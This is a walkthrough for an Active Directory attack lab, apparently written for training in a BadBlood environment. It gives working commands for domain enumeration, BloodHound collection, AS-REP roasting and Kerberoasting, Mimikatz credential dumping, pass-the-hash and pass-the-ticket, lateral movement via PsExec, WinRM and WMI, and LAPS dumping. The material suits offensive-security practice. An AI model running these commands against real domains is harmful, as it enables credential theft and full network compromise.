Realistic Active Directory Attack Lab Walkthrough: From Enumeration to Post-Exploitation
This hands-on guide is designed for your BadBlood AD lab and structured like a real-world AD attack path — from discovery to domain dominance. It’s meant to be practical, repeatable, and help you develop offensive intuition.
Phase 1: Enumeration – Users, Groups, and OUs
Goal: Identify users, groups, computers, and the layout of the domain.
# List all domain users
Get-DomainUser | Select-Object cn
# Dump all domain groups
Get-DomainGroup | Select-Object name
# Get members of a high-value group
Get-DomainGroupMember -Identity "Domain Admins"
# Get user group memberships
Get-DomainUser -Identity <username> -Properties memberof
# List all Organizational Units
Get-DomainOU
# List users in a specific OU
Get-DomainUser -SearchBase "OU=Tier 2,DC=security,DC=local"
# List all computers
Get-DomainComputer
Phase 2: BloodHound Recon
Goal: Identify privilege paths, misconfigurations, and escalation routes.
# Run collection from victim machine
Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\Temp
# Or use SharpHound.exe
SharpHound.exe -c All
Next:
- Import the
.zipinto BloodHound. - Explore:
- Shortest path to domain admin
- Kerberoastable users
- Users with local admin rights
- High-value targets and session overlap
Phase 3: Ticket-Based Attacks
AS-REP Roasting (no creds needed)
# Find users without pre-authentication
Get-DomainUser -PreauthNotRequired
Rubeus:
.\Rubeus asreproast
Crack with hashcat:
hashcat -m 18200 asrep_hashes.txt wordlist.txt
Kerberoasting (requires valid creds)
# Find service accounts with SPNs
Get-DomainUser -SPN
Rubeus:
.\Rubeus kerberoast
Crack with hashcat:
hashcat -m 13100 kerberoast_hashes.txt wordlist.txt
Phase 4: Privilege Escalation & Credential Dumping
PowerUp
Invoke-AllChecks
Mimikatz
privilege::debug
log
sekurlsa::logonpasswords
Goal: Escalate from a limited user to SYSTEM or find reusable credentials (passwords, hashes, tickets).
Phase 5: Credential Abuse
Pass-the-Hash (PTH)
sekurlsa::pth /user:<username> /domain:<domain> /ntlm:<hash> /run:cmd.exe
Pass-the-Ticket (PTT)
kerberos::list
kerberos::ptt <ticket.kirbi>
Use these techniques when you have NTLM hashes or .kirbi tickets and want to authenticate without knowing the actual password.
Phase 6: Lateral Movement
PsExec (SMB)
PsExec.exe \\target cmd.exe
PowerShell Remoting (WinRM)
Enter-PSSession -ComputerName target -Credential $cred
WMI Execution
Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList "cmd.exe" -ComputerName target
RDP
Use mstsc.exe or xfreerdp with stolen credentials if RDP is enabled.
Phase 7: Post-Exploitation & Pivoting
# Re-run BloodHound from new compromised machine
Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\Temp
# Enumerate sessions and local groups
Get-NetSession -ComputerName target
Get-NetLocalGroup -ComputerName target
- Search for scheduled tasks, startup scripts, GPP creds.
- Use the new access to gather more credentials and reach new systems.
Phase 8: Optional Techniques & Exploration
LAPS Password Dumping
Find-LapsPasswords
Unquoted Service Path Discovery
Get-WmiObject win32_service | Where { $_.PathName -like '* *' -and $_.PathName -notlike '"*"' }
GPO Enumeration
Get-DomainGPO
Get-DomainGPOLocalGroup
ACL Abuse
Find-InterestingDomainAcl
What to Do Next
- Rerun this playbook with different entry points (e.g., compromised service account).
- Try building BloodHound graphs from multiple hops.
- Practice chaining attacks: roasting → cracking → privesc → lateral movement → dump → pass → pwn.